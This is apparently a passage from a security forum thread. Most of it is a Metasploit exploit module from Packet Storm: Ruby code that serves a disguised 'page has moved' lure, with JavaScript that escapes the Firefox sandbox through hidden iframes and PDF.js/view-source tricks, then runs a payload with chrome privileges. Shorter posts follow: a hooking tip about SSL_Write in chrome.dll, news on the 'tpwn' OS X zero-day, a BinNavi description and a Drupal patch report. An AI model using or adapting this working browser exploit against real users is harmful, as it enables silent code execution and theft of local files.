    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    print_status('Sending exploit...')
    send_response_html(cli, html)
  end

  def html
    "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+
    "<script>#{js}</script></body></html>"
  end

  def default_html
    "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
  end

  def js
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
    r = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

    <<-EOJS
    function xml2string(obj) {
      return new XMLSerializer().serializeToString(obj);
    }

    function __proto(obj) {
      return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
    }

    function get(path, callback, timeout, template, value) {
      callback = _(callback);
      if (template && value) {
        callback = callback.replace(template, value);
      }
      js_call1 = 'javascript:' + _(function() {
        try {
          done = false;
          window.onclick = function() {
            if (done) { return; }
            done = true;
            q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");
            setTimeout(function(){
              q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';
              setTimeout(function(){
                var opts = #{JSON.unparse(opts)};
                var key = opts['#{key}'];
                q.messageManager.loadFrameScript('data:,'+key, false);
                setTimeout(function(){ q.close(); }, 100)
              }, 100)
            }, 100);
          }
        } catch (e) {
          history.back();
        }
        undefined;
      }, "%url%", path);
      js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
      sandboxContext(_(function() {
        p = __proto(i.contentDocument.styleSheets[0].ownerNode);
        l = p.__lookupSetter__.call(i2.contentWindow, 'location');
        l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
      }));
      setTimeout((function() {
        sandboxContext(_(function() {
          p = __proto(i.contentDocument.styleSheets[0].ownerNode);
          l = p.__lookupSetter__.call(i2.contentWindow, 'location');
          l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
        }));
      }), timeout);
    }

    function get_data(obj) {
      data = null;
      try {
        data = obj.document.documentElement.innerHTML;
        if (data.indexOf('dirListing') < 0) {
          throw new Error();
        }
      } catch (e) {
        if (this.document instanceof XMLDocument) {
          data = xml2string(this.document);
        } else {
          try {
            if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
              data = this.document.body.firstChild.textContent;
            } else {
              throw new Error();
            }
          } catch (e) {
            try {
              if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
                return null;
              } else {
                throw new Error();
              }
            } catch (e) {
              ;;
            }
          }
        }
      }
      return data;
    }

    function _(s, template, value) {
      s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
      s = s.substring(0, s.length - 1);
      if (template && value) {
        s = s.replace(template, value);
      }
      s += __proto;
      s += xml2string;
      s += get_data;
      s = s.replace(/\\s\\/\\/.*\\n/g, "");
      s = s + ";undefined";
      return s;
    }

    function get_sandbox_context() {
      if (window.my_win_id == null) {
        for (var i = 0; i < 20; i++) {
          try {
            if (window[i].location.toString().indexOf("view-source:") != -1) {
              my_win_id = i;
              break;
            }
          } catch (e) {}
        }
      };
      if (window.my_win_id == null) return;
      clearInterval(sandbox_context_i);
      object.data = 'view-source:' + blobURL;
      window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
      object.data = 'data:text/html,<'+'html/>';
      window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
        '"position:absolute; left:-9999px;" onload = "'+_(function(){
          window.wrappedJSObject.sandboxContext=(function(cmd) {
            with(importFunction.constructor('return this')()) {
              return eval(cmd);
            }
          });
        }) + '"/>');
    }

    var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';
    var i = document.createElement("iframe");
    i.id = "i";
    i.style=HIDDEN;
    i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
    document.documentElement.appendChild(i);
    i.onload = function() {
      if (this.contentDocument.styleSheets.length > 0) {
        var i2 = document.createElement("iframe");
        i2.id = "i2";
        i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';
        i2.height = window.innerHeight+'px';
        i2.width = window.innerWidth+'px';
        i2.src = "data:application/pdf,";
        document.documentElement.appendChild(i2);
        pdfBlob = new Blob([''], { type: 'application/pdf' });
        blobURL = URL.createObjectURL(pdfBlob);
        object = document.createElement('object');
        object.style=HIDDEN;
        object.data = 'data:application/pdf,';
        object.onload = (function() {
          sandbox_context_i = setInterval(get_sandbox_context, 200);
          object.onload = null;
          object.data = 'view-source:' + location.href;
          return;
        });
        document.documentElement.appendChild(object);
      } else {
        this.contentWindow.location.reload();
      }
    }
    document.body.style.height = window.innerHeight+'px';
    var kill = setInterval(function() {
      if (window.sandboxContext) {
        var f = "chrome://browser/content/browser.xul";
        get(f, function() {}, 0, "%URL%", f);
        clearInterval(kill);
      } else {
        return;
      }
    },20);
    EOJS
  end
end

Sursa: https://packetstormsecurity.com/files/133271
  22. Check this:

original_function = (LPVOID)GetProcAddress(GetModuleHandle("chrome.dll"),"SSL_Write");

It's wrong. Chrome.dll does not export that function. Binary find it.
  23. Zero-day flaw found in Mac OS X Yosemite security update
by Jason Murdock
18 Aug 2015

An Italian teenager has discovered a previously unknown zero-day vulnerability in Apple's Mac OS X platform that could be exploited by hackers to allow privileged access to Mac systems.

A proof-of-concept has been released by Luca Todesco, 18, who said the exploit uses bugs to corrupt the memory in the operating system that can then be used to access the system root shell.

The flaw, dubbed 'tpwn', is said to affect all versions of Yosemite, including the recently patched 10.10.5, but reportedly does not affect El Capitan.

Details of the flaw have been published on GitHub, and Todesco has faced criticism for contacting Apple about the problem only a few hours before publishing his findings.

Todesco said on Twitter that he has received significant condemnation on social media after publishing the code without giving Apple enough time to release a security fix.

This is kinda getting out of proportion. Best outcome for me would have simply been to stay quiet. I had reasons to drop it the other day.
— Luca Todesco (@qwertyoruiop) August 17, 2015

Todesco has released a third-party patch for the vulnerability called NullGuard which is included in the material published to GitHub, but it is not considered an official release and is not certified by Apple.

NULLGuard - Fixes tpwn & prevents NULL page mapping, rendering many bugs unexploitable. http://github.com/kpwn/NULLGuard
— Luca Todesco (@qwertyoruiop) August 16, 2015

The news comes after Apple recently rolled out a patch for OS X 10.10.5 to fix a ‘print to file' vulnerability discovered by German researcher Stefan Esser that allowed hackers to inject malware and adware into the Mac operating system without needing a password.

A separate research team discovered another major security flaw called Thunderstrike 2 that targets Mac firmware. Thunderstrike 2 was revealed at the 2015 Black Hat security conference in Las Vegas and can infect a MacBook via a phishing email that can then spread to any other hardware with which it comes into contact.

V3 has contacted Apple about whether the firm plans to release a patch for the 'tpwn' flaw but had not received a reply at the time of publication.

Sursa: http://www.v3.co.uk/v3-uk/news/2422517/zero-day-flaw-found-in-mac-os-x-yosemite-security-update
  24. BinNavi

    Copyright 2015 Google Inc.

    Disclaimer: This is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google.

    Introduction

    BinNavi is a binary analysis IDE - an environment that allows users to inspect, navigate, edit, and annotate control-flow-graphs of disassembled code, do the same for the callgraph of the executable, collect and combine execution traces, and generally keep track of analysis results among a group of analysts.

    Link: https://github.com/google/binnavi
  25. Drupal 6.37 and 7.39 released, critical vulnerabilities addressed
    Robert Abel, Content Coordinator

    Open source content management (CMS) platform Drupal has issued security patches to address several critical vulnerabilities affecting Drupal 6 and 7.

    According to the Wednesday advisory, versions of Drupal prior to 6.37 and 7.39 contain three vulnerabilities, including a cross-site scripting bug in the Autocomplete system, a cross-site request forgery bug in Form API, and an information disclosure flaw in Access system.

    The cross-site forgery vulnerability located in Form API "could allow a malicious user to upload files to the site under another user's account," the advisory said.

    Vulnerable versions of Drupal 7 are affected by two additional issues, including a cross-site scripting bug in the Ajax system and a SQL injection vulnerability in Database API. The SQL injection vulnerability can enable a "user with elevated permissions to inject malicious code in SQL comments," the advisory said.

    Source: Drupal 6.37 and 7.39 released, critical vulnerabilities addressed - SC Magazine